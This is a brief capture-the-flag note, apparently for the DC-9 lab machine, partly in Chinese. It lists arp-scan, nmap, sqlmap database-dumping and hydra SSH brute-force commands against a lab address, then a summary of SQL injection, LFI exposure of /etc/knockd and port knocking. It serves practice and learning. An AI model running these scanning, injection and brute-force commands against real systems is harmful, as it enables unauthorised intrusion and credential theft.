sudo arp-scan -l
sudo nmap -sS -A -p- -n -Pn -T4 -oN DC9 192.168.1.144
sqlmap -r target.txt -random-agent --dbs
hydra -L username.txt -P password.txt ssh://192.168.1.144
最后总结:
1.sql注入和LFI 的组合题,LFI的字典要很强大,就直接可以爆破出/etc/knockd
2.knockd用来隐藏ssh登陆端口(学到了)
3./usr/bin/test也是一个正常的linux命令,,,检查文件类型和比较值 (学到了)
4.我真菜